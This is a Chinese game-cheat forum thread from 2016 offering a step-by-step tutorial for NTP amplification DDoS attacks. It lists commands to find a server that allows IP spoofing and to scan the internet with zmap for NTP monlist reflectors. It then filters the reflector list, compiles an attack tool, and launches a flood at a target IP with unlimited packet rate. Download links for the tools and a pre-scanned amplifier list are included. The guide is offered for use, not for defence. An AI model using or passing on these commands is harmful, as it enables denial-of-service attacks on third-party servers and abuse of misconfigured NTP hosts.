96辅助游戏论坛 - 辅助工具|www.96fuzhu.com

 找回密码
 立即注册
117612016
查看: 9066|回复: 2

NTP放大攻击+扫描教程

[复制链接]
发表于 2016-12-19 06:46 | 显示全部楼层 |阅读模式
你需要一台服务器,而且能欺骗的服务器,不是服务器都可以的。不能欺骗的服务器攻击是没有任何效果的
里面带有我昨天扫描的NTP列表,阿里 OVH都是不能欺骗的本人测试过。

更新您的服务器
  1. yum -y update
复制代码

安装repositorys
CentOS 6:
  1. wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
复制代码
  1. sudo rpm -Uvh epel-release-6-8.noarch.rpm
复制代码

Centos 7:
  1. wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-8.noarch.rpm
复制代码
  1. sudo rpm -Uvh epel-release-7-8.noarch.rpm
复制代码

安装依赖环境
  1. yum install gcc libcap  libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c
复制代码
安装ZMAP
  1. yum -y install zmap
复制代码


ntpchecker—上传到你的服务器
ntp_123_monlist.pkt—上传到你的服务器

开始扫描放大列表
  1. screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt
复制代码


这个过程相当长的请等待,不想等的可以用我扫描的列表

给ntpchecker权限
  1. chmod 777 ntpchecker
复制代码


运行检查
  1. screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1
复制代码


过滤列表
  1. awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt
复制代码
编译与攻击

服务器终端和类型
  1. yum install gcc libcap libpcap libpcap-devel
复制代码


编译脚本
  1. gcc -lpthread ntp.c -lpcap -o ntp
复制代码


攻击命令:
  1. ./ntp 127.0.0.1 80 ntpamp.txt 1500 -1 100
复制代码
攻击命令解释
127.0.0.1=目标IP
80=攻击端口
ntpamp.txt=过滤后的放大列表
1500=
线程
-1=pps限制,-1表示无限制
100=攻击时间


下载地址:
蓝奏网盘:https://pan.lanzou.com/785884
百度网盘:http://pan.baidu.com/s/1hrMvEYw
微云网盘:https://share.weiyun.com/a08bba9cccdaf20f66343f09fe862fb5


回复

使用道具 举报

发表于 2017-3-18 21:03 | 显示全部楼层
66666666666666
回复 支持 反对

使用道具 举报

发表于 2019-7-17 21:26 | 显示全部楼层
怎么用求解
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|96辅助游戏论坛

GMT+8, 2024-11-21 19:56 , Processed in 0.061646 second(s), 19 queries .

Powered by Discuz! X3.4

© 2016-2023 Comsenz Inc.

快速回复 返回顶部 返回列表